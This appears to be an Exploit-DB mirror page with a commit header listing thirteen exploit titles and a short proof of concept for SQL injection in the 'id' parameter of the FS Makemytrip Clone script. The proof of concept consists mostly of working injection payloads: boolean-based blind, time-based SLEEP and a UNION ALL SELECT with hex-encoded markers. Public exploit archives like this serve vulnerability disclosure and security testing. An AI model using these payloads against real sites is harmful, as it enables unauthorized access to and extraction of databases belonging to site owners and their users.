exploit-db-mirror/exploits/php/webapps/43213.txt
Offensive Security 08d2346400 DB: 2017-12-07
13 changes to exploits/shellcodes

Arq 5.9.7 - Local Privilege Escalation
Murus 1.4.11 - Local Privilege Escalation
Arq 5.9.6 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation
Sera 1.2 - Local Privilege Escalation / Password Disclosure
Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation
Proxifier for Mac 2.19 - Local Privilege Escalation
FS Makemytrip Clone - 'id' SQL Injection
WinduCMS 3.1 - Local File Disclosure
FS Shaadi Clone - 'token' SQL Injection
2017-12-07 05:02:26 +00:00

26 lines
No EOL
838 B
Text

# Exploit Title: FS Makemytrip Clone - SQL Injection
# Date: 2017-12-05
# Exploit Author: Dan°
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/makemytrip-clone/
# Version: 2017-12-05
# Tested on: Kali Linux 2.0
(PoC):
SQL Injection on GET parameter = id
http://localhost/pages.php?id=
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2990=2990
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-4648 UNION ALL SELECT
NULL,NULL,CONCAT(0x716b767a71,0x47714f5a66644664796a6a426879674757634b707753727544424f616944536d4d70655276565854,0x7178627171),NULL--
YbYU
---